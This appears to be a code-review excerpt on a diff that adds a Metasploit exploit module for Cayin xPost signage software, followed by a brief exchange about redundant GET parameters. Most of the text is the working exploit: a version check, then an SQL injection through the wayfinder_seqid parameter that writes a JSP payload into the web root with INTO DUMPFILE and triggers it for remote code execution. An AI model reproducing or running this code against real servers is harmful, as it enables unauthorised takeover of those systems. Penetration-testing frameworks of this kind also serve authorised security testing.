modules/exploits/windows/http/cayin_xpost_sql_rce.rb

```diff
@@ -0,0 +1,153 @@
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'cayin', 'js', 'English', 'language.js'),
+      'method' => 'GET'
+    )
+
+    if res.nil? || res.code != 200
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service, check URI Path and IP")
+      return CheckCode::Safe
+    end
+
+    %r{// xPost v(?<version>[\d\.]+) } =~ res.body
+
+    if version && Gem::Version.new(version) <= Gem::Version.new('2.5')
+      print_good("Version Detected: #{version}")
+      return CheckCode::Appears
+    end
+
+    # try a backup plan, at least verify the title
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'cayin', 'index.jsp'),
+      'method' => 'GET'
+    )
+
+    if res.nil? || res.code != 200
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service, check URI Path and IP")
+      return CheckCode::Safe
+    end
+
+    if res.body =~ %r{<title>xPost</title>}
+      vprint_good('HTML Title includes xPost')
+      return CheckCode::Detected
+    end
+    CheckCode::Safe
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    CheckCode::Safe
+  end
+
+  def exploit
+    filename = datastore['PAYLOADNAME'].blank? ? "#{rand_text_alphanumeric(6..12)}.jsp" : datastore['PAYLOADNAME']
+    filename = "#{filaneme}.jsp" unless filename.end_with? '.jsp'
+
+    vprint_status("Utilizing payload filename #{filename}")
+    vprint_status("Payload Size: #{payload.encoded.length}")
+    vprint_status("Payload Size Encoded: #{payload.encoded.unpack1('H*').length}")
+
+    payload_request = "-251' UNION ALL SELECT 0x"
+    payload_request << payload.encoded.unpack1('H*')
+    payload_request << ',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL '
+    payload_request << "INTO DUMPFILE '#{datastore['LOCALWEBROOT']}#{filename}'-- -"
+    payload_request.gsub!(' ', '%20')
+
+    vprint_status('Attempting Exploitation')
+    uri = normalize_uri(target_uri.path, 'cayin', 'wayfinder', 'wayfinder_meeting_input.jsp')
+    # use raw to prevent encoding of injection characters
+    res = send_request_raw(
+      'uri' => "#{uri}?wayfinder_seqid=#{payload_request}",
+      'method' => 'GET'
+    )
+
+    fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+
+    if res.code == 400
+      fail_with(Failure::UnexpectedReply, "#{peer} - Payload too large, utilize a smaller payload")
+    end
+
+    if res.code != 302
+      fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response to injection")
+    end
+
+    register_file_for_cleanup("#{datastore['LOCALWEBROOT']}#{filename}")
+
+    vprint_status('Triggering uploaded payload')
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, filename)
+    )
```

Comment:
`'method' => 'GET'` is redundant, but you use it elsewhere. May as well be consistently redundant.

```suggestion
    send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, filename)
    )
```

Reply:
actually went the other way and removed the GETs.  no need for extra lines of code